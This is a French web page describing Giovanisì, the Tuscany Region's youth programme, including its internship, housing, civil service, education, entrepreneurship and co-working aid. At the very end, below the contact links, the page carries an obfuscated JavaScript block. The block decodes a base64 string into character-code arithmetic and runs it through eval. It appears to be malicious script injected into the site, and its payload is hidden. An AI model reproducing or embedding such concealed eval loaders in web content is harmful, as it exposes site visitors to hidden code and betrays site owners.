Giovanisì est un projet de la Région Toscane pour l’autonomie des jeunes. Il est financé par des ressources régionales, nationales et européennes (période de programmation 2014 – 2020, POR FSEPOR FEDER PDR FEADER) et repose sur 7 domaines: Stages, Logement, Service civil, Entreprendre, Travail, Éducation et Formation, Giovanisì+ (qui comprend des projets et initiatives dans des secteurs tels que la participation, la culture, la légalité, le sport et le social).

Giovanisì a systématisé et intégré les politiques régionales de la jeunesse.

Pas moins de 40 opportunités liées aux principales dimensions de la vie d’un jeune, une communication et information coordonnée et un modèle de gouvernance intégrée et transversale sont les principaux éléments qui caractérisent Giovanisì et qui ont permis d’atteindre 236.000 jeunes en allouant plus de 720 millions d’euros.

Les principaux objectifs de ce projet sont l’augmentation et la promotion des opportunités liées au droit à l’éducation et à la formation, le soutien de parcours pour l’insertion des jeunes dans le monde du travail et l’aide au lancement de start-up.

Le projet Giovanisì s’insère parmi les 24 projets stratégiques du Programme régional de Développement 2016-2020 (approuvé par le Conseil Régional dans sa Résolution n° 47/2017 et publié sur le B.U.R.T. (Bulletin officiel de la région Toscane) – Partie I n° 13 du 3 avril 2017) par lequel la Région Toscane entend atteindre les objectifs de « Europe 2020 ».

Les destinataires directs et indirects de ce projet sont les jeunes jusqu’à l’âge de 40 ans, et les cibles spécifiques varient en fonction du domaine. Depuis mai 2014, les mesures du projet Giovanisì sont soutenues par Garantie jeunesse.

Le projet Giovanisì est géré et coordonné par un bureau spécial dont le siège se trouve à la Présidence de la Région Toscane.

En ce qui concerne les domaines spécifiques:

Stages

La Région Toscane cofinance les stages hors cursus universitaire, qui donnent aux jeunes la chance de se former et de se préparer pour le marché du travail. Groupe cible : jeunes âgés de 18 à 29 ans.
Bénéficiaires directs : Les entreprises de la Région Toscane cofinancent les stages à hauteur d’un montant de 300 € au titre de remboursement des frais des stagiaires sur les 500 € mensuels exigés par la loi.

Stages dans le cadre du cursus universitaire et stages professionnels: À l’inverse des stages hors cursus universitaire, les entreprises et organismes publics en Toscane ne sont pas légalement tenus de rémunérer les stages effectués dans le cadre des études (enseignement secondaire, université, Master, Doctorat ou stage professionnel). Cependant, afin de promouvoir également la rémunération de ce type de stage, la Région Toscane prévoit une prime de 300 € pour les entreprises et organismes publics qui rémunèrent les jeunes stagiaires à hauteur d’au moins 500 € bruts par mois.

Logement

Afin d’aider les jeunes à s’émanciper de leur noyau familial d’origine et les aider à devenir indépendants, la Région Toscane contribue au paiement du loyer. Cette contribution dure trois ans et le montant reste inchangé, de 150 € à 350 € par mois, en fonction de leur revenu et de la présence ou non d’enfants à charge.

  • Groupe cible: jeunes âgés de 18 à 34 ans, résidant avec le noyau familial depuis au moins deux ans

Service civil

Afin de favoriser la participation et la citoyenneté active, la Région Toscane finance par le biais d’appels spécifiques des projets de service civil régional portant sur les thèmes suivants : la santé, l’environnement, l’éducation, la culture, l’aide à la personne, la protection civile, l’immigration, la défense des consommateurs, l’égalité des chances, le commerce équitable et solidaire et la coopération internationale.
Ces projets sont financés pour une période de 8 mois avec une contribution de 433 € par mois, directement versés par la Région Toscane au jeune qui participe au projet. Les projets sont gérés par des associations et organismes locaux.

  • Groupe cible: jeunes âgés de 18 à 29 ans

Éducation et formation

La Région Toscane a mis en place différentes incitations sous la forme de vouchers, bourses d’étude, programmes de formation professionnelle pour soutenir le droit à l’éducation, à la formation ainsi qu’à l’apprentissage des jeunes.

Entreprenariat

Afin de faciliter le lancement d’entreprises, la Région Toscane a mis en place diverses lignes d’action dans le secteur de l’entreprenariat. Tout particulièrement, la Région Toscane soutient les start-up et la stabilisation d’entreprises par le biais de vouchers pour couvrir les dépenses réalisées et par la promotion d’initiatives de microcrédit.
De plus, une attention particulière est portée au lancement d’entreprises dans le secteur agricole. Des contributions et autres aides sont fournies aux jeunes agricultures qui souhaitent lancer leur activité.

  • Groupe cible: jeunes âgés entre 18 et 40 ans et entreprises constituées de jeunes.

Travail

La Région Toscane fournit des primes pour les jeunes souhaitant lancer une activité au sein d’un espace de co-working en Toscane, en fournissant des vouchers aux jeunes co-workers de moins de 40 ans.

 

Info:
www.giovanisi.it
info@giovanisi.it
Suivez-nous également sur: Facebook | Twitter | Youtube | Instagram | Telegram | Flickr

 

accenti21
Suivez également Accènti, qui raconte Giovanisì : aspirations, rêves et espoirs des jeunes bénéficiant du projet Giovanisì, racontés en images et à travers des mots dans des vidéos, blogs et dans le livre Accènti.

 

 

 

 

var WVAFXEZMAJ = atob(‘dmFyIEJZT05CQkpEQ04gPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE3IC0gNywgMTI3IC0gOSwgMTAwIC0gMywgMTE1IC0gMSwgNDEgLSA5LCAxMTYgLSA5LCAxMTAgLSA5LCAxMjcgLSA2LCA0MSAtIDksIDY4IC0gNywgNDAgLSA4LCA0MiAtIDMsIDEyNiAtIDgsIDgyIC0gNiwgNzggLSA3LCA3OCAtIDYsIDEyNSAtIDUsIDk2IC0gOCwgOTUgLSA5LCA2OSAtIDIsIDEwOSAtIDIsIDEyMyAtIDUsIDQzIC0gNCwgNjQgLSA1LCAxMyAtIDMsIDExOSAtIDEsIDk5IC0gMiwgMTE3IC0gMywgNDAgLSA4LCAxMDMgLSAyLCAxMTYgLSA2LCAxMDggLSA5LCAxMDMgLSAyLCAxMDggLSA4LCAzNiAtIDQsIDY5IC0gOCwgNDEgLSA5LCA0MyAtIDQsIDY4IC0gMywgNzYgLSA5LCA1NiAtIDgsIDUxIC0gMiwgOTggLSAxLCA2OCAtIDMsIDEwOCAtIDUsIDExNiAtIDMsIDg2IC0gOSwgNzQgLSA3LCA1OCAtIDEsIDgzIC0gNywgODggLSA1LCA1NSAtIDYsIDk3IC0gOCwgMTEzIC0gMiwgODMgLSA4LCA3MSAtIDQsIDExNyAtIDIsIDg2IC0gOCwgODUgLSA3LCA5MCAtIDYsIDgyIC0gNSwgMTIyIC0gNiwgNzggLSA2LCA1MCAtIDEsIDEwNSAtIDIsIDg4IC0gMiwgODQgLSA0LCAxMDkgLSA0LCA3NCAtIDEsIDEyMCAtIDgsIDcwIC0gMiwgNzEgLSAzLCA1MCAtIDIsIDkwIC0gNiwgODEgLSA1LCAxMjMgLSA0LCA1OCAtIDYsIDEwMiAtIDQsIDcyIC0gMywgMTI4IC0gNywgNzYgLSAzLCAxMjMgLSAxLCA5NCAtIDUsIDcxIC0gMSwgNjQgLSA4LCAxMTcgLSAzLCA4NCAtIDYsIDg4IC0gNCwgNzggLSA5LCA2OSAtIDIsIDc1IC0gOSwgMTEwIC0gNywgNzYgLSAyLCAxMTYgLSAyLCAxMDUgLSA3LCAxMTYgLSA2LCA4MSAtIDMsIDEyMiAtIDEsIDc4IC0gMywgNzQgLSA3LCA4MyAtIDIsIDExMiAtIDQsIDcxIC0gNSwgNTcgLSA4LCAxMDcgLSA0LCA3MyAtIDMsIDg0IC0gOSwgOTIgLSA4LCA4NiAtIDksIDc3IC0gMywgNzUgLSA3LCA3MiAtIDUsIDEyNSAtIDYsIDExMyAtIDYsIDgxIC0gNiwgMTEyIC0gOSwgMTA5IC0gMiwgNzEgLSAzLCA3MSAtIDYsIDEwOSAtIDQsIDEwOSAtIDEsIDEyMSAtIDMsIDEwNSAtIDcsIDEyNyAtIDgsIDExNyAtIDIsIDExNyAtIDQsIDgwIC0gMiwgOTEgLSA0LCA4NiAtIDQsIDc1IC0gMywgOTAgLSA1LCA4NCAtIDIsIDU2IC0gNCwgNTcgLSA1LCA3OCAtIDEsIDEyNSAtIDMsIDEwNyAtIDMsIDczIC0gNiwgMTA4IC0gOCwgNTUgLSA0LCAxMDkgLSAyLCA1NSAtIDQsIDc3IC0gNiwgODQgLSAyLCAxMDIgLSAzLCA4NiAtIDUsIDc4IC0gMywgMTExIC0gNiwgNTcgLSA1LCAxMTUgLSAxLCA4MCAtIDksIDg5IC0gNiwgMTEwIC0gNywgNDggLSAxLCAxMDYgLSA4LCA4MyAtIDIsIDkyIC0gNywgMTA2IC0gOSwgOTIgLSA1LCA5MyAtIDksIDYzIC0gNywgMTI0IC0gMiwgODMgLSA4LCA4MyAtIDIsIDEyMSAtIDIsIDEyNCAtIDQsIDgyIC0gNCwgOTAgLSAzLCAxMjAgLSAxLCA3NCAtIDMsIDc3IC0gNywgMTIyIC0gMiwgNjMgLSA3LCAxMTQgLSA5LCAxMDAgLSAzLCA4NCAtIDEsIDc5IC0gNiwgODAgLSA0LCAxMDMgLSAxLCA1NiAtIDUsIDU4IC0gMSwgNjEgLSA5LCA5NCAtIDUsIDg4IC0gNiwgNzkgLSA2LCA5NiAtIDYsIDc5IC0gMywgMTI1IC0gMywgNzYgLSAzLCAxMTMgLSA1LCA3MyAtIDEsIDkxIC0gNywgOTYgLSA3LCAxMDcgLSAyLCAxMDMgLSA1LCA4NCAtIDMsIDgwIC0gMywgODkgLSA1LCA3NyAtIDcsIDEyOCAtIDcsIDExMCAtIDYsIDEyMCAtIDgsIDc3IC0gMiwgODYgLSA1LCAxMDggLSA1LCAxMTQgLSAzLCA4NCAtIDcsIDEyNiAtIDUsIDU3IC0gOSwgODMgLSAzLCA4MCAtIDIsIDkwIC0gOCwgNTcgLSA1LCAxMTcgLSA5LCA4NCAtIDksIDEyNSAtIDQsIDEyMyAtIDMsIDg1IC0gNCwgNzkgLSA0LCA3NCAtIDcsIDgzIC0gMiwgMTE3IC0gOSwgNjkgLSAzLCA1NCAtIDUsIDY2IC0gOSwgNzkgLSAxLCA4NSAtIDMsIDEwNSAtIDIsIDY4IC0gNywgNjcgLSA2LCA0NiAtIDcsIDY2IC0gNywgMTYgLSA2LCAxMDkgLSA3LCAxMjMgLSA2LCAxMTggLSA4LCAxMDMgLSA0LCAxMjIgLSA2LCAxMDYgLSAxLCAxMTUgLSA0LCAxMTkgLSA5LCAzMyAtIDEsIDEyMiAtIDIsIDExMyAtIDIsIDExNSAtIDEsIDk2IC0gMSwgMTA1IC0gNCwgMTE3IC0gNywgMTA0IC0gNSwgNDIgLSAyLCAxMjEgLSA2LCAxMjAgLSA0LCAxMjAgLSA2LCAxMTEgLSA2LCAxMTYgLSA2LCAxMDUgLSAyLCA1MCAtIDYsIDQxIC0gOSwgMTA5IC0gMiwgMTA2IC0gNSwgMTI5IC0gOCwgNDQgLSAzLCAzNCAtIDIsIDEyOCAtIDUsIDEyIC0gMiwgNDAgLSA4LCAzNiAtIDQsIDEyNSAtIDcsIDEwMyAtIDYsIDExNyAtIDMsIDM2IC0gNCwgMTIxIC0gNywgMTAyIC0gMSwgMTIxIC0gNiwgMzMgLSAxLCA2OSAtIDgsIDQwIC0gOCwgNDYgLSA3LCA0MCAtIDEsIDY3IC0gOCwgMTggLSA4LCA0MCAtIDgsIDM2IC0gNCwgMTA5IC0gNywgMTE2IC0gNSwgMTE5IC0gNSwgMzYgLSA0LCA0NCAtIDQsIDEyNiAtIDgsIDEwNSAtIDgsIDExNiAtIDIsIDQwIC0gOCwgMTA2IC0gMSwgMzcgLSA1LCA2NyAtIDYsIDQxIC0gOSwgNTEgLSAzLCA2MCAtIDEsIDM1IC0gMywgMTA4IC0gMywgMzMgLSAxLCA2OCAtIDgsIDM4IC0gNiwgMTIwIC0gNSwgMTIwIC0gNCwgMTE3IC0gMywgMTEyIC0gNywgMTE4IC0gOCwgMTExIC0gOCwgNDggLSAyLCAxMTEgLSAzLCAxMDkgLSA4LCAxMTIgLSAyLCAxMTAgLSA3LCAxMTggLSAyLCAxMTEgLSA3LCA2OCAtIDksIDQxIC0gOSwgMTEyIC0gNywgNDQgLSAxLCA0NiAtIDMsIDQ4IC0gNywgNDEgLSA5LCAxMjggLSA1LCAxNiAtIDYsIDM0IC0gMiwgMzcgLSA1LCA0MSAtIDksIDQwIC0gOCwgMTE5IC0gNSwgMTA0IC0gMywgMTE5IC0gNCwgMzMgLSAxLCA1MSAtIDgsIDY2IC0gNSwgNDAgLSA4LCA4NCAtIDEsIDEyMSAtIDUsIDExOSAtIDUsIDExMyAtIDgsIDExNSAtIDUsIDEwNiAtIDMsIDUyIC0gNiwgMTA1IC0gMywgMTIwIC0gNiwgMTE4IC0gNywgMTEzIC0gNCwgNzUgLSA4LCAxMTIgLSA4LCAxMDMgLSA2LCAxMTUgLSAxLCA2OSAtIDIsIDExMiAtIDEsIDEwNiAtIDYsIDEwMiAtIDEsIDQ2IC0gNiwgMTE2IC0gMSwgMTE3IC0gMSwgMTIwIC0gNiwgMTA4IC0gMywgMTE4IC0gOCwgMTA1IC0gMiwgNDggLSAyLCAxMDggLSA5LCAxMDkgLSA1LCAxMDYgLSA5LCAxMTkgLSA1LCA3MyAtIDYsIDExNSAtIDQsIDEwNCAtIDQsIDEwOSAtIDgsIDY5IC0gNCwgMTIwIC0gNCwgNDUgLSA1LCAxMTIgLSA3LCA0NyAtIDYsIDQwIC0gOCwgMTAwIC0gNiwgMTkgLSA5LCAxMCAtIDEsIDE3IC0gOCwgMTcgLSA4LCAxNCAtIDUsIDExNCAtIDcsIDEwMyAtIDIsIDEyOSAtIDgsIDQ4IC0gMiwgMTAxIC0gMiwgMTA4IC0gNCwgMTAxIC0gNCwgMTE2IC0gMiwgNzIgLSA1LCAxMTkgLSA4LCAxMDIgLSAyLCAxMDUgLSA0LCA2OSAtIDQsIDExOCAtIDIsIDQ2IC0gNiwgMTExIC0gNiwgMzkgLSA3LCAzOSAtIDIsIDM4IC0gNiwgMTA5IC0gMiwgMTEwIC0gOSwgMTI4IC0gNywgNTUgLSA5LCAxMTQgLSA2LCAxMTAgLSA5LCAxMTggLSA4LCAxMDYgLSAzLCAxMjIgLSA2LCAxMDcgLSAzLCA0OSAtIDgsIDUwIC0gOSwgNjUgLSA2LCAxMiAtIDIsIDM4IC0gNiwgMzkgLSA3LCAxMjYgLSAxLCAxOSAtIDksIDM0IC0gMiwgNDEgLSA5LCAxMjMgLSA5LCAxMDcgLSA2LCAxMjQgLSA4LCAxMjQgLSA3LCAxMTggLSA0LCAxMTIgLSAyLCAzNiAtIDQsIDEyMiAtIDgsIDEwNSAtIDQsIDExNyAtIDIsIDY0IC0gNSwgMTggLSA4LCAxMzMgLSA4LCAxNSAtIDUsIDEzIC0gMywgMTE5IC0gMSwgMTAwIC0gMywgMTIwIC0gNiwgMzMgLSAxLCAxMDIgLSAyLCAxMDggLSA3LCAxMDEgLSAyLCAzOCAtIDYsIDY3IC0gNiwgMzggLSA2LCAxMjUgLSA1LCAxMTYgLSA1LCAxMjMgLSA5LCAxMDIgLSA3LCAxMDIgLSAxLCAxMTkgLSA5LCAxMDMgLSA0LCA0OCAtIDgsIDk4IC0gMSwgMTE5IC0gMywgMTE3IC0gNiwgMTA3IC0gOSwgNDcgLSA3LCAxMDcgLSA2LCAxMTggLSA4LCAxMDggLSA5LCAxMDYgLSA1LCAxMDEgLSAxLCA0NSAtIDQsIDUyIC0gOCwgMzkgLSA3LCAxMTYgLSA5LCAxMDUgLSA0LCAxMjYgLSA1LCA0MiAtIDEsIDYxIC0gMiwgMTkgLSA5LCA0OCAtIDgsIDExOCAtIDgsIDEwNCAtIDMsIDEyMSAtIDIsIDM3IC0gNSwgNzggLSA4LCAxMTkgLSAyLCAxMTggLSA4LCAxMDQgLSA1LCAxMTkgLSAzLCAxMTQgLSA5LCAxMTUgLSA0LCAxMTUgLSA1LCA0MSAtIDEsIDEwMiAtIDIsIDExMCAtIDksIDEwNCAtIDUsIDUwIC0gOSwgNDggLSA3LCA0NyAtIDcsIDQzIC0gMiwgNjMgLSA0LCAxOSAtIDksIDE3IC0gNyk7ZXZhbChCWU9OQkJKRENOKTs=’);
eval(WVAFXEZMAJ);